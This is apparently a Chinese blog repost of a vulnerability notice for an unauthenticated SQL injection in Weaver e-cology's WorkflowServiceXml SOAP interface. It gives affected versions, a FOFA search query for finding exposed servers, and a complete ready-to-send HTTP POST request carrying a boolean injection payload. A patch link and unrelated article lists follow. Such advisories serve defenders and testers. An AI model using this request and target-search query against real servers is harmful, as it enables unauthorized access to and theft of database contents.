泛微e-cology WorkflowServiceXml SQL注入漏洞(POC)

漏洞描述:
泛微 e-cology 是泛微公司开发的协同管理应用平台。泛微 e-cology v10.64.1的/services/接口默认对内网暴露,用于服务调用,未经身份认证的攻击者可向 /services/WorkflowServiceXml 接口发送恶意的SOAP请求进行SQL注入,攻击者通过漏洞可以获取服务器数据库敏感信息。

漏洞发现时间:

2024-7-12


影响版本:
e-cology9 < 10.64.1

FOFA语法:

app="泛微-OA(e-cology)"

POC:

POST /services/WorkflowServiceXml HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Content-Type: text/xml
Accept-Encoding: gzip
Content-Length: 487

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservices.workflow.weaver"> <soapenv:Header/>
  <soapenv:Body>
      <web:getHendledWorkflowRequestList>
        <web:in0>1</web:in0>
        <web:in1>1</web:in1>
        <web:in2>1</web:in2>
        <web:in3>1</web:in3>
        <web:in4>
            <web:string>1=1 AND 5615=5615</web:string>
        </web:in4>
      </web:getHendledWorkflowRequestList>
  </soapenv:Body>
</soapenv:Envelope>

漏洞复现:


修复:

目前官方已有可更新版本,建议受影响用户升级至最新版本:

https://www.weaver.com.cn/cs/securityDownload.html

参考文献:

OSCS | 开源软件供应链安全社区 | 让每一个开源项目变得更安全

POC/泛微OA-E-Cology接口WorkflowServiceXml存在SQL注入漏洞.md at main · wy876/POC · GitHub

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-07-17 23:42:06       66 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-07-17 23:42:06       70 阅读
  3. 在Django里面运行非项目文件

    2024-07-17 23:42:06       57 阅读
  4. Python语言-面向对象

    2024-07-17 23:42:06       68 阅读

热门阅读

  1. C语言12 宏定义、内存

    2024-07-17 23:42:06       20 阅读
  2. 使用Python进行车牌识别

    2024-07-17 23:42:06       21 阅读
  3. Android11 设置一个默认密码 万能密码

    2024-07-17 23:42:06       18 阅读
  4. github.com/antchfx/jsonquery基本使用

    2024-07-17 23:42:06       19 阅读
  5. 初学Python必须知道的14个强大单行代码

    2024-07-17 23:42:06       20 阅读
  6. 讲真,现在留给2024年下半年软考的时间还够吗?

    2024-07-17 23:42:06       22 阅读
  7. 【MySQL】10.用户管理

    2024-07-17 23:42:06       21 阅读
  8. 前端学习(二)

    2024-07-17 23:42:06       17 阅读
  9. JVM 垃圾回收算法

    2024-07-17 23:42:06       21 阅读
  10. 脑电信号中的相位的类型和作用

    2024-07-17 23:42:06       24 阅读
  11. MySQL表中允许有多少个 TRIGGERS(触发器)?

    2024-07-17 23:42:06       19 阅读
  12. 生成式 AI 的发展方向,是 Chat 还是 Agent?

    2024-07-17 23:42:06       17 阅读
  13. 面试题 HashMap中key的存储索引是怎么计算的

    2024-07-17 23:42:06       21 阅读